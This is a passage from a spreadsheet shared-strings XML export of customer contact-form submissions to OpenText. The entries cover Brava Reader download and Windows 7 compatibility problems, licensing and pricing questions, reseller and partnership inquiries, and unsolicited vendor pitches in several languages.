    <t>I ordered Brava Single Seat under the wrong Email(Typo). My order number is IGS-182454. Email should have been "chris.schuele@toyota-boshoku.com" instead of "chris.schuele@toyota-bosoku.com". Can you please reissue to my email? Thanks!</t>
  </si>
  <si>
    <t>Hello, I'm Matías from Argentina and I need Gupta Report Builder to edit reports. How can I buy your product? and how much is it? what are the next step to have this product?</t>
  </si>
  <si>
    <t xml:space="preserve">I just want to inform you that in the latest version of Brava Reader there are few problems regarding *.tif and *.tiff files. The biggest problem is that the detailed zoom is not working, at one moment the image is becoming white and nothing is displayed. I tested on windows 7 and 10 and is the same._x000D_
Thank you_x000D_
Alin_x000D_
</t>
  </si>
  <si>
    <t>Unable to Download free Brava reader after registering to the site.</t>
  </si>
  <si>
    <t>We created Content Runner, a writing management marketplace out of_x000D_
Seattle, Washington and I would like to discuss how we could work_x000D_
together. I imagine you often need written content for your clients’_x000D_
sites and I thought you might like to try out our writers._x000D_
_x000D_
_x000D_
_x000D_
Accounts are free, and I would like to offer you a $30 credit to give_x000D_
it a try. Is this something you are interested in?_x000D_
_x000D_
_x000D_
_x000D_
*If you are not interested in our offer, email me and we will not_x000D_
contact you again*</t>
  </si>
  <si>
    <t xml:space="preserve"> I keep getting the message that my license is invalid and that I need to update. But I don't know where to go or how to do it.. Can I get some guidance</t>
  </si>
  <si>
    <t>I am having trouble with the latest download for Brava Reader.  I need to make sure I am getting the latest.  Where can I download it from?</t>
  </si>
  <si>
    <t>We currently have some projects in version 7 of Exstream on a Windows 2008 server, and are trying to decide if the best route is to upgrade these projects to version 9.5, which we have installed on a Windows 2012 server, or if we can simply install version 7 on the 2012 server, and keep working on these projects in version 7, with the intention of upgrading them to version 9.5 at a later date.  We would like to know if OpenText would provide support for an Exstream version 7 install on a Windows 2012 server.  Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">To whom it may concern,_x000D_
_x000D_
We would like to schedule a conference call sometime this week or next week to discuss the grant. Please let me know when is a good day/time to speak on the phone? We can do Wednesday or Friday anytime between 9:00 am to 12:00 pm or 1:30 pm to 2:30 pm. My program director, Nibal Markus, will be speaking with you. _x000D_
_x000D_
We are a nonprofit organization based on Texas that works to achieve socio-economic transformation through community engagement with Real Life Financial Mathematics, a project oriented, outcome-based, personal financial education, career discovery, and post-secondary education blended online curriculum for high school students._x000D_
_x000D_
Thank you in advance for your time and consideration._x000D_
_x000D_
I look forward to hearing back from you soon._x000D_
_x000D_
Cynthia Rodriguez_x000D_
Videographer_x000D_
</t>
  </si>
  <si>
    <t>Brava Reader download</t>
  </si>
  <si>
    <t>Prezados,_x000D_
_x000D_
Gostaria de informações sobre o licenciamento do software Centura para desenvolvimento WEB._x000D_
_x000D_
Atualmente utilizamos o RAD da IBM e precisamos apresentar novas ferramentas para substituir o atual cenário de desenvolvimento da empresa._x000D_
_x000D_
Ficamos no aguardo,_x000D_
Obrigado.</t>
  </si>
  <si>
    <t>Looking into embedded BI tools for resale</t>
  </si>
  <si>
    <t xml:space="preserve">What does pricing look like for Brava viewer? I need it to work with windows 7 and that computer is offline. </t>
  </si>
  <si>
    <t>Hello, I have been attempting to download the free Brava reader via the request form without success.  Is there an alternative source?_x000D_
Thank you,_x000D_
Bob</t>
  </si>
  <si>
    <t>deneme</t>
  </si>
  <si>
    <t>Are "Active X Brava Viewer", “Brava! Enterprise Client" and "Brava desktop" different products? Or are two or more of them the same product?</t>
  </si>
  <si>
    <t>A client is looking to us to become a RightFax partner for support and I thought it was worth looking into. Please let me know if you are already covered in Bermuda.</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Dear Sir/Madam,_x000D_
Good day!_x000D_
How are you today?_x000D_
This is Ann from TenDynasty ,which is an integrated manufacturer for plastic injection molding, die casting, stamping and automation assembly for many years in Dongguan China._x000D_
I am writing to look for the chances to support your esteemed company.Here is our company website: www.ten-dynasty.com. Any interested or if you can not find the part you required, please let me know._x000D_
Warmly welcome to visit our factory and thank you for your time._x000D_
_x000D_
BR.with thanks_x000D_
Ann_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>For a Job</t>
  </si>
  <si>
    <t>Dear Sirs, please could you send us the mean to download the Brava Reader.exe or send us the file by mail ; We need a version that could run with Windows  7 professional. We have not yet the windows 10 version asked with the last version of Brava available in the website. Thank you very much in advance_x000D_
l'équipe de la Bss centrale_x000D_
BRGM Orléans (France)</t>
  </si>
  <si>
    <t>Good morning, _x000D_
We are receiving calls from you for FAX. However, this is not the right fax number. Please cancel our number of your database._x000D_
Best regards_x000D_
Alix</t>
  </si>
  <si>
    <t>Hi, I tried to download a copy of the ON DIGITAL book, but never received a link once I submitted my information. Hope you can help. Thanks, Karen</t>
  </si>
  <si>
    <t>Bonjour, je viens de télécharger vos 2 applications : FreeDWG Viewer et BravaViewer, mais je ne dispose pas encore du système WINDOWS 10. Je suis encore sous le système WINDOWS 7 Entreprise._x000D_
Aussi pourriez-vous m'adresser des liens de téléchargement qui fonctionnent avec le système d'exploitation WINDOWS 7 Entreprise, afin que je puisse exploiter vos applications._x000D_
D'avance, je vous en remercie_x000D_
Cordialement_x000D_
M. DU BELLAY</t>
  </si>
  <si>
    <t>Good morning,_x000D_
_x000D_
Can you tell me how to download a trial version of Quickscan Pro please? I have tried looking on your website here https://www.emc.com/enterprise-content-management/captiva/captiva-iec.htm#!trial_software but the link doesn't work.</t>
  </si>
  <si>
    <t>Hello there. First of all, I have been using your long-running programs and I recommend it to you. But Brava Reader has been forced to support windows 10 in the last update. The programs we run are only postponed to our windows 10 transition due to running on windows 7. For this reason, we still have to use windows 7. I would like to know how to use Free Brava Reader in Windows 7 version. I wish you continued your studies. Have a nice day.</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
ich hatte letzte Woche Kontakt mit Frau Sachse. Ich warte noch auf Ihr schriftliches Angebot._x000D_
Bitte kontaktieren Sie mich hierzu._x000D_
Vielen Dank!_x000D_
Mit freundlichen Grüßen_x000D_
Ina Adolphs</t>
  </si>
  <si>
    <t>Check on feasibility to digitize Employee pfiles and integrate with Successfactors</t>
  </si>
  <si>
    <t>Hello Team, _x000D_
_x000D_
I am writing to you from Aquion in Australia. We are a software reseller and currently we have a customer inquiry regarding OpenText._x000D_
_x000D_
Can we purchase this software directly from you on behalf of our customer located here in Australia?_x000D_
_x000D_
We do not need a quote at this stage. In your response, please also include questions that we may ask the client to help determine the solution they require. _x000D_
_x000D_
Any help would be greatly appreciated._x000D_
_x000D_
Thank you in advanced._x000D_
_x000D_
Kind regards,_x000D_
_x000D_
Yuling Liu</t>
  </si>
  <si>
    <t>interested to purchase The software is called Brava Desktop</t>
  </si>
  <si>
    <t>Looking to get a quote on RightFax</t>
  </si>
  <si>
    <t>Looking to partner with you.</t>
  </si>
  <si>
    <t xml:space="preserve">Web page needs attention._x000D_
_x000D_
Page not found_x000D_
_x000D_
The requested page "/vercheck" could not be found._x000D_
</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
In order to become and remain successful and competitive, businesses must continuously improve their processes. Failure to do so is likely to result in higher costs, lower revenues, less motivated employees and fewer satisfied customers._x000D_
_x000D_
Aculides is a B2B contact providing firm serving all the industries and sectors. We can provide you opt in business contacts based on your target criteria._x000D_
_x000D_
The job titles include CIO,COO,CTO, VP Operations, VP Compliance, VP Process Improvement or Process, Operations Directors, Process Managers/Directors, Compliance Directors, Compliance Managers, Operations Managers and Process Improvement Managers from all the industry._x000D_
_x000D_
Kindly let me know your target criteria so that I can provide you count available with us:_x000D_
_x000D_
Target Geography:_x000D_
Target Job Titles:_x000D_
Target Industry:_x000D_
_x000D_
Look forward to your response._x000D_
_x000D_
Regards,_x000D_
Ethan Morris</t>
  </si>
  <si>
    <t>Hi, I accidentally entered my email address incorrectly during the checkout process. Can I fix this and receive my download of the software?_x000D_
_x000D_
Thanks!</t>
  </si>
  <si>
    <t>Boa tarde, nós atendemos o Bradesco, que utiliza o OpenText Web Experience Management v8.1. Gostaria de saber se podemos desenvolver sem a necessidade de adquirir uma licença e como faço para ter acesso ao download do software?_x000D_
_x000D_
Obrigado._x000D_
_x000D_
Att,_x000D_
Lucas Boemeke</t>
  </si>
  <si>
    <t xml:space="preserve">Would like to have the support full access ( so that I can see the documentation and get the ticket creating rights etc). I am getting an error going through the register link. I am working with Meenakshi Chouhan/Kiran Jallapalli/mukthiar pinjari in the operations team. </t>
  </si>
  <si>
    <t>Applying for Jobs in Canada. Kindly share the HR Email ID to send my updated resume. Thanks.</t>
  </si>
  <si>
    <t>Interested in Documentum. Thank you.</t>
  </si>
  <si>
    <t>Bonjour, _x000D_
_x000D_
Nous souhaiterions mettre en place une solution de dématérialisation au sein de Radio France. Nous sommes également en train de mettre en place SAP (go live 01/01/2018)_x000D_
_x000D_
N'hésitez pas à m'appeler pour en discuter_x000D_
_x000D_
Bien cordialement, _x000D_
_x000D_
Michael muller</t>
  </si>
  <si>
    <t xml:space="preserve">Looking for information on Edocs DM.  We are shopping around for a document management system.  I need prices and a basic overview of product.  Thanks! </t>
  </si>
  <si>
    <t>Looking for a central point of contact within OpenText to help support opportunity pursuit and partnering opportunities for our clients.</t>
  </si>
  <si>
    <t>Can you please advise where I can find release notes for versions of Teamsite from 7.4 onwards?  Thanks.</t>
  </si>
  <si>
    <t>I've downloaded the free Brava Reader but cannot get it to start. when I click on getting started I get error 403 page not found._x000D_
How do I get it to run please</t>
  </si>
  <si>
    <t>Back file office project and work flow creation.</t>
  </si>
  <si>
    <t>I did not receive an email with the invoice for our April payment, like I usually do every month. My credit card was charged and I have to submit the invoice. We have account # 7816.</t>
  </si>
  <si>
    <t xml:space="preserve">We are a new (non live) Infor M3 customer.  We are not yet live, we installed StreamServe several years ago, and did not go live, but have now upgraded in prep for our planning to go live in the next year.  We have installed StreamServe 5.6.2.  I was not involved in the original install (which may have been associated to one of our companies - Interplastic.)  Please can you adivse as to what is required to assure our license is up to date? </t>
  </si>
  <si>
    <t>I filled out the form to get a 15 day trial, and have not received a link or instructions to download.  I'm evaluating to see if the redacting features will work for Covance.</t>
  </si>
  <si>
    <t>Hallo!_x000D_
_x000D_
ich bin für einen Kunden auf der Suche nach einer Lösung für die elektronische Eingangsrechnungsverarbeitung, die sich nahtlos in SAP ERP integrieren lässt. Könnten Sie mir bitte hierzu Infomaterial zukommen lassen und einen Ansprechpartner nennen._x000D_
Beste Grüße!_x000D_
Jürgen Diehm</t>
  </si>
  <si>
    <t>i need to update my Brava Reader, normally i can download the update from this site??? i submitted the form and have not received the update download??</t>
  </si>
  <si>
    <t>We have an old instance of ApplicationXtender (5.20.033) we are looking to either upgrade or retire. We are in the discovery phase and trying to map out our options. We are particularly interested in the ability to simply archive the existing documents in a way that allows users to search via metadata and access the documents when necessary. Any information you can offer would be greatly appreciated.</t>
  </si>
  <si>
    <t>I am Peter McKenna, the Email administrator at 123Greetings.com, Inc. Our emails are blocked by your organization. We send emails to our subscribers with @opentext.com email IDs only. But they are not receiving these. We have rDNS, fDNS, SPF, DMARC, DKIM setup. We are CAN-SPAM,CASL compliant and registered with major FBLs. We use specials@123g.biz to send emails. So please white list us as we follow the best practices of email delivery.</t>
  </si>
  <si>
    <t>We cancelled our RightFax support awhile ago, but we will be installing a ServicePack to our SQL server that hosts RightFax. In the event that something does break, can you provide us your hourly rate for support?</t>
  </si>
  <si>
    <t>demo version</t>
  </si>
  <si>
    <t>Hi,_x000D_
I need your solution datasheet for FAX. I have a client and I am trying to position a Fax solution._x000D_
_x000D_
Nader,</t>
  </si>
  <si>
    <t>We would like to know the procedures to be resellers in portugal._x000D_
_x000D_
Best regards,_x000D_
Pedro Aleluia</t>
  </si>
  <si>
    <t>Hi_x000D_
_x000D_
I'm working on a project, which is related to pretty old versions (8.5) of the SQLBase. Unfortunately I am not able to open my customer databases with the latest versions of SQLBase. Is there any possibility to download older versions of the SQLBase?_x000D_
_x000D_
best regards_x000D_
Petri Voltti</t>
  </si>
  <si>
    <t xml:space="preserve">I need to access knowledge center, please grand me the access. </t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I would like to know if OpenText provides access to Knowledge Center to independent developer who doesn't have any direct link with any client._x000D_
_x000D_
I am an Content Server developer and will be very happy, if OpenText provides access to Knowledge Center resources like Documentations and release notes and we can also give feedback or comments on existing discussion or articles._x000D_
_x000D_
Thanks,_x000D_
Kishore Kumar</t>
  </si>
  <si>
    <t>interested in evaluating openText</t>
  </si>
  <si>
    <t>Gentlemen_x000D_
Your Saudi Distributor ( Nogtat Alwan ) is not giving feedback about the license renewal for our client ( Royal Commission for Jubail )</t>
  </si>
  <si>
    <t>Seeking document management solution for small law firm.</t>
  </si>
  <si>
    <t>I found a bug in latest BravaReader ._x000D_
When I turn and extend TIF, indication is confused._x000D_
Also I do not open large size TIF data._x000D_
I want you to revise it, do you have revise plan?_x000D_
OS is windows 7 32bit Japanese._x000D_
Best regards,</t>
  </si>
  <si>
    <t>Please provide Exceed on demand 13.8.8 client  version download URL.</t>
  </si>
  <si>
    <t>We recently purchased OpenText for a new SAP implementation for Leaseplan, however, with my current user, when I try to open a technical support ticket, I get the message that I am not authorized. Do we have a support agreement between OpenText and Leaseplan?</t>
  </si>
  <si>
    <t>Good morning.  Since the apple ios 10.3.1 update, I haven't been recieving forced new email ping notifications. Is there an update to do?</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
I downloaded the latest version of free Brava Reader_x000D_
Is there a version that supports Windows 7?_x000D_
Thanks_x000D_
Dror Pollak_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Need Training on StreamServe (Classroom or online)..Urgent requirement</t>
  </si>
  <si>
    <t>Brava 16.2 does not correspond to windows 7?_x000D_
Does it correspond to windows 7 users?</t>
  </si>
  <si>
    <t xml:space="preserve">Interesse em projeto para uma plataforma global. Teremos que fazer mais de 100.000.000 de operações simultaneas. www.7ports.com.br_x000D_
</t>
  </si>
  <si>
    <t>Im looking to buy a fax server that will integrate with our web based application and change that into a digital or analog port that can connect to our company's PBX, which is a Mitel 3300</t>
  </si>
  <si>
    <t>I recently received our Media Code (PCM) for TD 7.0 (upgrade) from out local distributor._x000D_
I downloaded it and installed it but it didn't generate an Activation Code (PAC) in order to register/activate it._x000D_
It won't run, it won't activate, it just says I must register and activate it._x000D_
What should I do?_x000D_
Business Phone is not working until nex week since we are on vacation period._x000D_
We are very close to terminate our actual GLS, and I'm urging people to renovate._x000D_
Many thanks in advance.</t>
  </si>
  <si>
    <t>I just recently received our PCM from our local distributor for T.D. 7.0._x000D_
I installed it using the PCM provided._x000D_
When I run it "first time" it won't give me a PAC in order to register it  and won't let me use it.</t>
  </si>
  <si>
    <t>I need access to My support to get technical documents for Accell SQ? 8.3, 9.1 and DataServer.  My company has a support agreement.  I am leading the conversion effort from Accell 8.3 to 9.1 and need access to these documents immediately.</t>
  </si>
  <si>
    <t>Looking for a simple solution to meed EDI requirements for trading with Beverages and More in southern California.</t>
  </si>
  <si>
    <t>we would like to talk to someone about creating an online archive for our artwork.</t>
  </si>
  <si>
    <t>I am looking for POC info (name, phone, email address) so that my Govt customer (DOE/NNSA) can contact to ask further questions on Open Text Records Management Application</t>
  </si>
  <si>
    <t>Currently looking for an enterprise web content management solution and would like to have a brief scoping call to determine viability with OpenText.</t>
  </si>
  <si>
    <t>I would like your assistance in getting the contact name and information for the person in charge of your marketing department.  we are a supply chain magazine and I feel like we are missing out on opportunities to work together across both editorial and marketing.  I appreciate your help.  Jolene</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
I placed an order today (IGS-182433) and entered the wrong email address for contact details.  I changed my account as soon as I could but feel I may have missed to license/download links for the program._x000D_
_x000D_
Please let me know how to proceed, thanks.  </t>
  </si>
  <si>
    <t xml:space="preserve">Notice of a typo in the D2 R&amp;D v 4.3 user guide. _x000D_
_x000D_
Hello, _x000D_
There is a conflict in the D2 R&amp;D 4.3 user guide where page 75 indicates that Cat 2 documents can be self-approved, but then on page 78, the guide indicates that self-approval is reserved for Cat 3 documents._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Need details for eDocs/Adobe Sign integration.</t>
  </si>
  <si>
    <t>BUENAS TARDES:_x000D_
SOLICITO COLABORACION CON LA FICHA TECNICA DE LA ETIQUETA PARA LA OPENTEX 2253</t>
  </si>
  <si>
    <t>Guys, good afternoon !!! I would keep this contact to inform you that this new version of Brava Reader that uses for Windows 7 the update KB2999226 x64 is very slow and with very poor tiff drawing resolution getting impossible to work with this software._x000D_
I ask you to kindly check it as we advertise it to our clients, but this way we will be obliged to stop using it and try to find another program that will help us to do the reading quickly and efficiently without the need of this moment to migrate For Windows 10 as this will only occur in the company in the second half of 2018._x000D_
Certain of the attention, I look forward to this brief return on this subject and if possible a solution._x000D_
_x000D_
Att .;_x000D_
_x000D_
Ailton Jr.</t>
  </si>
  <si>
    <t>Interested in learning more about your Open Text Platform as looking for secure and centralized platform in which to store our Legal documents.</t>
  </si>
  <si>
    <t>I am researching Data Archiving Solutions for multiple legacy EMR systems.  Do you direct sell and support the Clinical Archiving solution or do I need to work with a partner of OpenText?_x000D_
Thank you.</t>
  </si>
  <si>
    <t>What is involved in upgrading from OS: Microsoft Windows Windows 7 Enterprise, Version 6.1, Build 7601_x000D_
  Service Pack 1 to Service Pack 2?</t>
  </si>
  <si>
    <t xml:space="preserve">Hello-_x000D_
I have been unable to pull our roster from the WW Ops Location all day. Is there any update on this issue? Thanks so much! </t>
  </si>
  <si>
    <t>Good Afternoon, _x000D_
_x000D_
Currently working on a client engagement and it is looking possible that we will be incorporating Documentum into our project. The client is all iSeries, would you be able to support this / what information would be required? Also, could you give further details on how your licensing is structured? _x000D_
_x000D_
Thank you! _x000D_
Nick</t>
  </si>
  <si>
    <t>Pricing needed for Fax2Mail._x000D_
Is pricing on a per user basis? _x000D_
Expected user count - 60</t>
  </si>
  <si>
    <t>Please quote_x000D_
_x000D_
We are just looking for 1 maint license for NFS solo</t>
  </si>
  <si>
    <t xml:space="preserve">I have lost my link to your site where I can add or change Fax phone numbers.  Can you send me my link, login and password._x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Good Afternoon, _x000D_
_x000D_
I am working with a client and Documentum has been discussed as a possible component of our project. Would you please be able to provide more detail on: _x000D_
_x000D_
- What information you require for licensing / a customer to be setup on Documentum? _x000D_
_x000D_
- What is the general structure / Overview of your licensing setup?  _x000D_
_x000D_
- A framework / overview of your general pricing? _x000D_
_x000D_
Thank you very much for you help! _x000D_
_x000D_
Nick_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t xml:space="preserve">want to learn about tools to extract text from PDF using a zone to determine write-downs on an invoice. Take content into a database for review and upload. PDFs are attached to an inbound email. </t>
  </si>
  <si>
    <t>Need to obtain a support quote for Alchemy.  We currently have support through a reseller and I need a quote directly from OpenText._x000D_
I believe our current account number might be EU00134902-40202-KY-US</t>
  </si>
  <si>
    <t>My fax to mail is being returned to me and stating I am not authorized to use this service. I am.</t>
  </si>
  <si>
    <t>Unable to install Brava Reader on windows 7?</t>
  </si>
  <si>
    <t>Attempting to login to catalogue.gxs.com user I.D. is U094A and I have correct password but don't know what Network I.D. is. New to company (Indolink Corp) Stephanie Debourg no longer works for us. 2nd attempt.</t>
  </si>
  <si>
    <t xml:space="preserve">We need to renew our support contract for RightFax. </t>
  </si>
  <si>
    <t>Purchase one copy of free OpenText Brava! Reader. It is annoying that I have to download a new version every 6 months</t>
  </si>
  <si>
    <t>Good Morning,_x000D_
_x000D_
I reached out a little while ago with a brief inquiry. I just wanted to touch base and ensure my previous email was received? If not, or it was lost, let me know and I’ll gladly resend._x000D_
_x000D_
Kind Regards,_x000D_
Peter Darmon</t>
  </si>
  <si>
    <t>Need to download new version of Right Fax (5.6 or higher) to test in our new environment that includes Windows Server 2012/2016 and Windows 10 with Office 2013/2016.</t>
  </si>
  <si>
    <t>Tax form W-9 needed</t>
  </si>
  <si>
    <t>Need information to go to Enterprise World 2017, is there a chance we can get cortesy passes for 3 individuals.  We currently use Documentum Suite via Evertec.</t>
  </si>
  <si>
    <t>Is Apple MacOS supported?</t>
  </si>
  <si>
    <t>trying to resolve invoices and coverage.  attempting to contact A/R with no response.  Please have someone call my number. thank you.</t>
  </si>
  <si>
    <t>Request for qoutation for fax</t>
  </si>
  <si>
    <t>I am attempting to install Brava Reader but it reports that I need to install the Microsoft KB2999226 patch before it can continue. I attempt to install the patch and it says the patch is not applicable for my system. I am running Windows 7 x64. Is there any fix for this that you are aware of? Thank you.</t>
  </si>
  <si>
    <t>Gostaria de conhecer a grade de treinamentos de VIM, pois implementamos na Siemens recentemente junto com GRC e há a necessidade de realização de treinamento para o time de suporte.</t>
  </si>
  <si>
    <t>Hi team,_x000D_
_x000D_
I have a request from one of our clients regarding the cloud fax. They want to replace all analog fax lines by cloud fax. _x000D_
_x000D_
I have some concerns about your services. It would be greatly appreciated if you could support me._x000D_
_x000D_
Thanks._x000D_
_x000D_
Viet</t>
  </si>
  <si>
    <t>Hi;_x000D_
we're interested in your product which name is OpentextDocumentum. Which company is your partnership in Turkey for opentextdocumentum? Could you please share with us?</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir or madam,_x000D_
_x000D_
Glad to have a chance introduce us to you. We are chinese supplier for tufted/memory foam bath mat and area rugs._x000D_
_x000D_
Do you ever thinking about Microfiber, Acrylic bath rug or memory foam mat? here I attached our catalogs for your review._x000D_
_x000D_
Samples are available, and we offer small MOQ for our friends to have a try. For quality-We are ready if you need any certificate._x000D_
_x000D_
Look forward to have a cooperation!_x000D_
_x000D_
Snow_x000D_
Sales_x000D_
Aphrodite Trade (Wuhan) Co., Ltd_x000D_
</t>
  </si>
  <si>
    <t>Pls provide Sales's contact window at SHA CHINA</t>
  </si>
  <si>
    <t>job vacancy</t>
  </si>
  <si>
    <t>Renewal of Documentum Licenses</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Greetings!_x000D_
This is Lea of Media Meter. I would like to send a proposal with regards to the media monitoring services of our company. May I know the email Add of the point person in your communication department? We could set a trial account for you._x000D_
Quick Overview:_x000D_
Media Meter is a media monitoring agency based in the Philippines. _x000D_
We are a media intelligence service provider which supports and provides vital information being extracted from different publications, websites, and broadcast networks._x000D_
Our objective is to feed companies with relevant issues, stories, or advertisements released in public that concern their specific industry market._x000D_
For more than 10 years now we have helped organizations become more aware and be one step ahead in terms of their media exposure, effectiveness of their public relation activities and marketing campaigns._x000D_
_x000D_
Please see our website for your reference: https://media-meter.net/home/main_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Lea R. Tapican| Client Relations Manager_x000D_
Direct Line: 414.4496  local 106 or 961.7322 local 106_x000D_
Mobile: 0999.885.4325_x000D_
Address: 3/F, Blupoint Building, 106 Kamuning Road Quezon City, Philippines 1103_x000D_
 _x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I submit the e-mail but reply isn't coming yet ._x000D_
</t>
  </si>
  <si>
    <t>SAP message:178385,password locked</t>
  </si>
  <si>
    <t xml:space="preserve">Dear ECM,_x000D_
_x000D_
This is Wei Jin from BMW NSFC IT Operation team. Nice to meet you!_x000D_
I searched in the internet, and tried to find the best document management company, and I found your company. _x000D_
_x000D_
BMW itself has a document management system already, but maybe we are thinking to replace it in future. _x000D_
So the reason I write the email to you is I would like to know more about your company and especially about your document management product. _x000D_
_x000D_
Could you please tell me if you are interested that we are partners in future?_x000D_
Thanks!_x000D_
</t>
  </si>
  <si>
    <t>Looking for on premises Fax to Email solution that integrates with Cisco Call Manager 10.5</t>
  </si>
  <si>
    <t>Je suis Cédric Mondésir, Assistant Chargé de Projets au niveau d’une Institution Financière en Haïti. Nous sommes actuellement à la recherche d’une entreprise capable de nous accompagner dans l’évaluation de notre système d’archivage actuel et  à la mise en place d’un système d’archivage électronique moderne répondant aux normes internationales tout en étant adapté à notre réalité._x000D_
_x000D_
 Dans la mesure où vous serez prêt et disposé à offrir vos services en Haïti dans le cadre de ce projet, nous vous saurions gré de bien vouloir nous contacter par email à : cmondesir@unibankhaiti.com pour de plus amples informations.</t>
  </si>
  <si>
    <t xml:space="preserve">I want to apply for your company if you have any vacancies </t>
  </si>
  <si>
    <t>We need your partner in Saudi Arabia</t>
  </si>
  <si>
    <t>Sehr geehrte Unternehmensleitung,_x000D_
_x000D_
wir möchten Sie für unsere wunderbare Kinder-Filmreihe gewinnen._x000D_
Es wäre toll, Sie bei diesem tollen Projekt als Partner zu haben !_x000D_
_x000D_
„Ein Kind zu lieben heißt, die Welt mit seinen Augen zu sehen“_x000D_
_x000D_
( Janusz Korczak )_x000D_
_x000D_
Es geht darum, Kinder zu stärken._x000D_
Kinder für diese Welt fit zu machen, mit Toleranz, Wissen und Vorstellungskraft für eine Welt der Zukunft._x000D_
Wo auch immer sie auf diesem Planeten leben._x000D_
_x000D_
Mittel dazu sind die Kraft der Phantasie und das Interesse an anderen Kulturen,_x000D_
Integration und interkulturelles Lernen, Kreativität, Fußball und der Sport, sind der Focus unsere Film-Themen._x000D_
_x000D_
Eine weltweite Schul-Kinderfilmreihe ist unser Traum._x000D_
Dafür brauchen wir jetzt Unterstützung und Sponsoren._x000D_
_x000D_
Eine vergleichbare Kinderserie - bei der sich die Kids -durch die Filme und über das "Filmende Klassenzimmer" im Internet interkulturell über Foren, Whats-App, Skype, FB, Instagram und andere Channels austauschen können, gibt es bislang nicht._x000D_
_x000D_
In diesem Sinne haben wir gemeinsam mit Kindern im Alter von 10-11 Jahren_x000D_
- alle standen das erste Mal vor der Kamera - den ersten großartigen Film unserer Schulfilmreihe gedreht._x000D_
_x000D_
Mit unserer Schul-Filmreihe setzen wir Zeichen für interkulturelle Horizonte und Inclusion._x000D_
_x000D_
Themen unserer Kinderfilme sind das Reisen und die Welt entdecken, der Schutz der Natur, Toleranz, interkulturelles Lernen, Sport und Bewegung und der Glauben an die Kraft der Phantasie._x000D_
_x000D_
Unser erster Film wurde im Landkreis München- Bad Tölz gedreht und wird in ganz Deutschland auf Festivals und an Schulen gezeigt und als Unterrichtsmaterial eingesetzt. Er wird den Kultusministerien als Pilotfilm für die Kinderfim-Serie vorgestellt. Als Modellprojekt haben wir das Potential in die Breite zu wirken und werden deutschlandweit Schulen, Familien, Kinder und Jugendliche erreichen. _x000D_
_x000D_
Hier kommen die Artikel der Süddeutschen Zeitung und des Münchner Merkur über unsere Dreharbeiten_x000D_
_x000D_
https://www.merkur.de/l</t>
  </si>
  <si>
    <t xml:space="preserve">this is to  be good _x000D_
</t>
  </si>
  <si>
    <t>I want to test Brava! Desktop 7.3 DXP before I buy the same. Please provide me an url for downloading &amp; testing the DXP version</t>
  </si>
  <si>
    <t xml:space="preserve">Would you be interested in having us help sell your service for you? _x000D_
 _x000D_
Basically we create animated videos that are designed to promote your service and increase your websites conversion rate (with some clients reporting a 40% increase in online sales)_x000D_
_x000D_
If you're interested, we would happily build you a 30 second explainer video for your service for just $297. (including script/voiceover)_x000D_
_x000D_
I’m confident we can make a killer video for you.. _x000D_
_x000D_
I look forward to your reply, or you can see some examples here :) _x000D_
www.click-campaigns.com/sale _x000D_
_x000D_
Matt_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Dear Sir,_x000D_
_x000D_
Department of IT&amp;C, Government of Rajasthan is planning to build a DSS, Machine Learning Tool and many other components through AI engine._x000D_
_x000D_
This engine will integrate all Govt. Portals ( Such as Bhamashah, e-mitra, Rajasthan Sampark, BSBY and all other government department related portals) and will create a digital environment which is helpful to citizen and assist in decision making to Government._x000D_
_x000D_
I am hereby requesting to you please send a write-up or PPT about your AI engine, which can be discussed at the higher level._x000D_
_x000D_
You are free to give presentation/ Demonstration related to same at DoIT HQ, Jaipur._x000D_
_x000D_
Thanks._x000D_
_x000D_
With Regards,_x000D_
_x000D_
Pradumna Dixit_x000D_
ACP - Dy. Director_x000D_
Dept. of IT &amp; C_x000D_
Yojna Bhawan_x000D_
Jaipur - 302005_x000D_
Mobile- +91-9887766332</t>
  </si>
  <si>
    <t>Something has happened that after I send an email, a blank (all white) screen comes up and I have to delete it before I can read my next incoming message.  Before, once I clicked "send," the page would open up and I could see the status of my emails opened, answered, and still to be opened (on the left side of the screen)._x000D_
I would imagine it is just a setting; however, I do not know which one it is, or what it should be set on._x000D_
Thank you-----</t>
  </si>
  <si>
    <t>We currently own 60 licenses of Brava! Desktop, and I would like to purchase an additional 15 licenses. I'm not sure who to contact.</t>
  </si>
  <si>
    <t xml:space="preserve">I need an install for your Enterprise Scan software for a computer that was replaced. </t>
  </si>
  <si>
    <t>My free Brava Reader I use needs to be renewed on 4/19/2017.  Currently have Build:  16.0.2.23,  Package: 16.0.2.13  Where can I find the download to renew Free Brava Reader?  Usually have to renew ever 3/ 4 months._x000D_
_x000D_
Thank you_x000D_
_x000D_
Bob Lantz</t>
  </si>
  <si>
    <t>GDPR data mapping automation</t>
  </si>
  <si>
    <t>Please consider this mail as important and require your acknowledgement. Currently, we are organizing International Conference on Ecology and Ecosystems during September 18-20, 2017, Toronto, Canada. We sincerely intended to convey our conference Agenda in your Organization. If possible, provide the contact information so that we will send the conference agenda with program details and make further follow up</t>
  </si>
  <si>
    <t xml:space="preserve">Bonjour,_x000D_
_x000D_
Je suis un consultant indépendant en charge d’un cahier des charges pour une assurance en Suisse. Nous allons publier un appel d’offre pour une solution de capture (numérisation RAD/LAD) sur des documents standards (factures, courriers, …) mais aussi des formulaires manuscrits. Le volume de documents numérisé est de 11 millions de documents par an environ._x000D_
_x000D_
La partie archivage et processus est déjà en place._x000D_
_x000D_
Une solution de Capture est déjà en place depuis 10 ans mais ne convient plus._x000D_
_x000D_
